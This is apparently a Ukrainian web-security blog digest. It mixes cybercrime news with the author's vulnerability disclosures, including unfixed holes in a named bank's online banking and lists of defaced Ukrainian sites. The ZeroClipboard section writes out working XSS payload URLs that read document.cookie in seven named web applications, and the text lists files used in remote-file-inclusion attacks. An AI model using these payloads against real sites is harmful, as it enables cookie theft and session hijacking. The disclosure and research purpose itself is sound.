Websecurity - Веб безпека

За повідомленням www.xakep.ru, оголошено конкурс нових алгоритмів хешування.

Ненадійність паролів і застосовуваних методів хешування останнім часом стала усім очевидна. Одержавши базу парольних хешів, зловмисники можуть у лічені дні розшифрувати більшу частину паролів. Що робити в такій ситуації - не зовсім зрозуміло. Деякі вважають, що виходом може бути застосування інших алгоритмів хешування. Для цього проводиться конкурс Password Hashing Competition.

Замість того, щоб піднімати безпеку сайтів і не допускати витоків паролів чи їхніх хешів, ці діячі пропонують боротися з наслідками. І організували такий конкурс. При тому, що алгоритмів хешування багато, в тому числі є нові алгоритми, які важче брутфорсяться. Але їм хочеться ще нових алгоритмів, аби тільки не проводити аудити безпеки власних сайтів .

За повідомленням ain.ua, українські інтернет-шахраї з початку року встигли збагатитися на 12,5 млн грн.

З початку року відділ МВС по боротьбі з кіберзлочинністю виявив 23 факти незаконного списання грошей з рахунків комерційних підприємств на суму близько 12,5 млн. грн. Удалося повернути майже 9,2 млн.

За словами представників відділу, розкривати подібні шахрайства вкрай складно, оскільки кіберзлочинці дуже легко знищують сліди шахрайства, і з’являється проблема з доказами. Приміром, при шахрайстві з крадіжкою грошей з рахунків хворих дітей кіберзлочинцям удалося вкрасти майже 100 тис. грн.

За повідомленням www.xakep.ru, Eurograbber пограбував європейців на 36 мільйонів євро.

Група шахраїв, що поширювала банківський троян Eurograbber, поставила новий рекорд по обсягу коштів, вилучених у жителів Західної Європи. За інформацією з нового звіту, опублікованого компаніями Versafe і Check Point Software Technologies, збиток від цієї шкідливої програми оцінюється в суму близько 36 мільйонів євро, а кількість потерпілих - приблизно в 30000 чоловік.

У січні, 17.01.2013, вийшли PHP 5.3.21 та PHP 5.4.11. В яких виправлено біля 10 багів. Дані релізи направлені на покращення стабільності гілок 5.3.x і 5.4.x.

У лютому, 21.02.2013, вийшли PHP 5.3.22 та PHP 5.4.12. В яких виправлено біля 10 багів. Дані релізи направлені на покращення стабільності гілок 5.3.x і 5.4.x.

Жодних уразливостей в цих версіях PHP виправлено не було.

По матеріалам http://www.php.net.

30.06.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://peb.com.ua - сайті банка “Промэкономбанк” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про energobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

23.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка Промекономбанк. Всього 109 уразливостей в системи IFOBS.

https://ibank.peb.com.ua:7002

Дані уразливості досі не виправлені.

У лютому, 17.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них YAML, Multiproject для Trac, UserCollections для Piwigo, TAO і TableTools для DataTables для jQuery. Та існує багато інших уразливих веб додатків з ZeroClipboard.

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

YAML:

http://site/yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Multiproject extension for Trac:

http://site/themes/default/htdocs/flash/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height 

UserCollections extension for Piwigo:

http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TAO:

http://site/filemanager/views/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TableTools plugin for DataTables plugin for jQuery:

http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

InfoGlue:

http://site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

OGDI Field for Drupal:

http://site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Вразливі наступні веб додатки з флешкою: YAML 4.0.2 та попередні версії, Multiproject 1.4.21 та попередні версії, UserCollections для Piwigo, TAO 2.3.1 та попередні версії, TableTools для DataTables для jQuery. Зокрема він постачається з InfoGlue 2.1 (та попередніми версіями) та OGDI Field 6.x-1.0 (та попередніми версіями) для Drupal.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти. Враховуючи, що після жовтня в моїх логах не було українських сайтів (тільки закордонні), що використовувалися для RFI атак, то я проаналізував більш старіші логи.

Похакані сайти в Уанеті:

• http://mpress.com.ua (невідомим хакером) - 04.2010
• http://pelet.at.ua (невідомим хакером) - 04.2010
• http://halupa.org.ua (невідомим хакером) - 05.2010
• http://tkj.at.ua (невідомим хакером) - 06.2010

Файли, що використовувалися для RFI атак (файли вже давно прибрані з сайтів):

http://mpress.com.ua/templates/zfxid1.txt
http://pelet.at.ua/bogel/id1.txt
http://halupa.org.ua/plugins/sh/id1.txt
http://halupa.org.ua/plugins/sh/idsuper.txt
http://tkj.at.ua/id1.txt

Продовжуючи розпочату традицію, після попереднього відео про викрадення рухів курсору в Internet Explorer, пропоную нове відео на веб секюріті тематику. Цього разу відео про RCE eксплоіт для Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability

В даному відео ролику демонструється використання Metasploit Framework для проведення атаки на уразливість в Internet Explorer. В Metasploit створюється і запускається експлоіт для IE, який призводить до віддаленого виконання коду в Internet Explorer при відкритті сторінки з кодом експлоіту. Даний експлоіт відкриває шел на атакованому комп’ютері, що дозволяє нападнику отримати контроль над ним.

Атака відбувається при відвідуванні в IE спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

В даній добірці експлоіти в веб додатках:

• cURL Buffer Overflow Vulnerability (деталі)
• Mozilla Firefox 18.0.2/Opera 12.12/Internet Explorer 9 Memory Corruption (деталі)
• D-LINK DIR-300 / DIR-600 Remote Root Exploit (деталі)
• MS12-037 Internet Explorer 8 Same ID Property Deleted Object Handling Memory Corruption (деталі)
• Midori Browser 0.3.2 Denial Of Service Object++ Exploit (деталі)

Виявлені можливості виконання коду в Microsoft Exchange і FAST Search Server.

Уразливі продукти: Microsoft Exchange 2007, Exchange 2010, FAST Search Server 2010.

Виконання коду при перегляді документа через Outlook Web Access / Advanced Filter Pack пов’язана з використанням технології Oracle Outside In.

• Microsoft Security Bulletin MS13-012 - Critical Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2809279) (деталі)
• Microsoft Security Bulletin MS13-013 - Important Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution (2784242) (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://varva-rada.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ssd-koda.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://loko.pz.gov.ua (хакером Dr.SHA6H) - 11.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://mriya.pz.gov.ua (хакером Dr.SHA6H) - 11.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ivc.pz.gov.ua (хакерами з 1923Turk) - 15.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.bronedveri.lviv.ua (хакером Hmei7) - 17.10.2012, зараз сайт вже виправлений адмінами
• http://www.eridon.ua (хакером r00tturk) - 17.02.2013, зараз сайт вже виправлений адмінами
• http://raokriomrati.org (хакером Badi)
• http://www.capoeira.kiev.ua (хакером guba) - 05.02.2013, зараз сайт вже виправлений адмінами
• http://www.mizgir.com (хакером rEd X) - 01.02.2013, зараз сайт вже виправлений адмінами

Сайти varva-rada.gov.ua і ssd-koda.gov.ua вже були взломані торік.

В даній добірці уразливості в веб додатках:

• RSA Data Protection Manager Multiple Vulnerabilities (деталі)
• Directory Traversal - EasyITSP <= 2.0.7 (деталі)
• Weak password encryption on Huawei products (деталі)
• 0day full - Free Monthly Websites v2.0 - Multiple Web Vulnerabilities (деталі)
• radsecproxy security update (деталі)
• Privilege Gaining in DataLife Engine (деталі)
• RSA Adaptive Authentication (On-Premise) Cross-Site Scripting Vulnerabilities (деталі)
• CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability (деталі)
• EMC Smarts Network Configuration Manager Multiple Vulnerabilities (деталі)
• jQuery vulnerability (деталі)